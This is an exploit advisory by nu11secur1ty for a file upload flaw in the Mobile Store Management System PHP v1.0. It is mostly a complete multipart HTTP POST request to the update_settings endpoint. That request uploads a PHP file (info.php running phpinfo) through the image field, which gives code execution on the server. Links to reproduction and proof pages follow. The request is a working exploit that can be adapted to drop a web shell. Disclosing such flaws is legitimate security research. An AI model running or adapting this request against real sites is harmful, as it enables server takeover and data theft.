## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using
## Author: nu11secur1ty
## Date: 03/13/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/file-upload## Description:
The upload function and id=cimg parameter are not sanitizing correctly!
The attacker can upload any PHP file which he can execute directly on
the server!
STATUS: HIGH-CrITICAL Vulnerability
[+]Payload:
```POST
POST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 6318
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarypV7nBYU4nAonvWel
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112
Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/mobile_store/admin/?page=system_info
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dg
Connection: close
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="name"
Mobile Store Management System - PHP
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="short_name"
MSMS-PHP
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="about_us"
<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;
margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:
70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:
0px; clear: both; border-top: 0px; height: 1px; background-image:
linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),
rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:
0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px
-160px; padding: 0px; position: sticky; top: 20px; width: 160px;
height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);
font-family: "Open Sans", Arial, sans-serif; font-size: 14px;
background-color: rgb(255, 255, 255);"></div><div id="bannerR"
style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;
top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,
0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;
background-color: rgb(255, 255, 255);"></div><div class="boxed"
style="margin: 10px 28.7969px; padding: 0px; clear: both; color:
rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:
14px; text-align: center; background-color: rgb(255, 255, 255);"><div
id="lipsum" style="margin: 0px; padding: 0px; text-align:
justify;"></div></div></div><p style="margin-right: 0px;
margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsum
dolor sit amet, consectetur adipiscing elit. Nullam non ultrices
tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas
iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit
vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin
lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et
malesuada fames ac ante ipsum primis in faucibus. Pellentesque
habitant morbi tristique senectus et netus et malesuada fames ac
turpis egestas. Praesent eleifend interdum est, at gravida erat
molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur
et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus
porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus
sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at
lacus vehicula, aliquam purus quis, pharetra lorem.</p><p
style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;
padding: 0px;">Proin consectetur massa ut quam molestie porta. Donec
sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent
per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar
ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu
blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend
id, aliquet ut libero. Nunc scelerisque vulputate turpis quis
volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum
imperdiet, nulla vitae pharetra pretium, magna felis placerat libero,
quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper
cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien
consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae
tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,
id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;
margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id ante
vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat
turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus
pulvinar, eros id ultricies mollis, lectus velit viverra mi, at
venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh
felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur
dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in
convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula
pretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><p
style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;
padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis id
cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit
ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non
lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at
pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,
vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in
tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis
dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque
mauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;
margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quis
imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus
lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique
nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae
nisi. Curabitur at quam ut libero convallis mattis vel eget mauris.
Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus
nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum
non magna at, molestie gravida magna. Aenean neque sapien, volutpat a
ullamcorper nec, iaculis quis est.</p>
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="privacy_policy"
<p>Sample Privacy Policy<br></p>
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="img"; filename="info.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="banners[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarypV7nBYU4nAonvWel--
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)
## Time spent:
00:05:00